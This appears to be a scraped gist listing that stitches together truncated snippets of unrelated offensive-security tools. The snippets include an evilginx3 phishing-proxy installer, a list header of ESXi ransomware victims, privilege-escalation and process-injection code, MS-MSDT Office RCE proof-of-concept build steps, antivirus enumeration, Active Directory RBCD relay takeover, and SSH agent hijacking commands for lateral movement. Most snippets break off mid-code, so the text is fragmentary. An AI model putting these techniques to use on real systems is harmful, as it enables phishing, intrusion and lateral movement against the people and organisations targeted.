@dunderhay
dunderhay / install_evilginx3.sh
Last active March 8, 2025 16:36
bash script to install evilginx3 on a ubuntu linux host
#!/bin/bash
set -e
GO_VERSION="1.22.3"
GO_URL="https://go.dev/dl/go${GO_VERSION}.linux-amd64.tar.gz"
EXPECTED_CHECKSUM="8920ea521bad8f6b7bc377b4824982e011c19af27df88a815e3586ea895f1b36"
# Log output of script
exec > >(tee -i /home/ubuntu/install.log)
exec 2>&1
@cablej
cablej / esxi_victims.csv
Last active June 9, 2023 02:42
A list of ESXi victims Censys, published by Ransomwhere
ip,address,city,country,country_code,port,dns_names,reverse_dns
// TcbElevation - Authors: @splinter_code and @decoder_it
#define SECURITY_WIN32
#include <windows.h>
#include <sspi.h>
#include <stdio.h>
#pragma comment(lib, "Secur32.lib")
void EnableTcbPrivilege(BOOL enforceCheck);
@tothi
tothi / ms-msdt.MD
Last active February 7, 2025 12:01
The MS-MSDT 0-day Office RCE Proof-of-Concept Payload Building Process

MS-MSDT 0-day Office RCE

MS Office docx files may contain external OLE Object references as HTML files. There is an HTML scheme "ms-msdt:" which invokes the msdt diagnostic tool, which is capable of executing arbitrary code (specified in its parameters).

The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).

Here are the steps to build a Proof-of-Concept docx:

  1. Open Word (an up-to-date 2019 Pro, build 16.0.10386.20017, was used), create a dummy document, insert an (OLE) object (as a Bitmap Image), and save it as docx.
#!/usr/bin/env python3
import os
import caracara
import sys
hosts = caracara.HostsToolbox(key=os.environ["FALCON_CLIENT_ID"],secret=os.environ["FALCON_CLIENT_SECRET"],verbose=True)
with open(sys.argv[1]) as doc:
    for _hostname in doc.readlines():
        target_aid = hosts.host.find_host_aid(hostname=_hostname.strip())
@mttaggart
mttaggart / make-lnk.ps1
Last active September 23, 2023 20:15
make-lnk.ps1
param ( [string]$SourceExe, [string]$DestinationPath, [string]$IconPath)
$WshShell = New-Object -comObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut($DestinationPath)
$Shortcut.RelativePath = "..\..\..\..\..\..\..\..\..\$SourceExe"
$Shortcut.IconLocation = $IconPath
$Shortcut.TargetPath = $SourceExe
$Shortcut.Save()
#AntiVirus Query
#Author: @r3dQu1nn
#Queries the Registry for AV installed
#Thanks to @i_am_excite and @merrillmatt011 for the help
#Props to @zerosum0x0 for the wmic find!
#Long ass one-liner :)
$powershellcmd = "\$av_list = @(\"BitDefender\", \"Kaspersky\", \"McAfee\", \"Norton\", \"Avast\", \"WebRoot\", \"AVG\", \"ESET\", \"Malware\", \"Windows Defender\");\$av_install = Get-ItemProperty HKLM:\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\*;\$av_install1 = Get-ItemProperty HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\*;\$regkey = 'HKLM:\\SOFTWARE\\Microsoft\\Windows Defender\\Signature Updates\\';\$av_loop2 = foreach (\$av1 in \$av_list){foreach (\$key in \$av_install){if (\$key.DisplayName -match \$av1 -eq \$TRUE){% {\"{0}|{1}|{2}\" -f \$key.DisplayName.ToString(), \$key.DisplayVersion.ToString(), \$key.InstallDate.ToString()}}}};\$proc_temp = Get-Process;\$av_loop = foreach (\$av in \$av_list){foreach (\$zz in \$proc_temp){if (\$zz.path -match \$av -eq \$TRUE)
@gladiatx0r
gladiatx0r / Workstation-Takeover.md
Last active January 2, 2025 00:23
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure

Overview

In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. In short, this is accomplished by:

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

Here's one of my favorite techniques for lateral movement: SSH agent forwarding. Use a UNIX-domain socket to advance your presence on the network. No need for passwords or keys.

root@bastion:~# find /tmp/ssh-* -type s
/tmp/ssh-srQ6Q5UpOL/agent.1460

root@bastion:~# SSH_AUTH_SOCK=/tmp/ssh-srQ6Q5UpOL/agent.1460 ssh [email protected]

user@internal:~$ hostname -f
internal.company.tld
@rvrsh3ll
rvrsh3ll / DInjectQueuerAPC.cs
Created November 20, 2020 15:10 — forked from jfmaes/DInjectQueuerAPC.cs
.NET Process injection in a new process with QueueUserAPC using D/invoke - compatible with gadgettojscript
using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;
namespace DinjectorWithQUserAPC
{
public class Program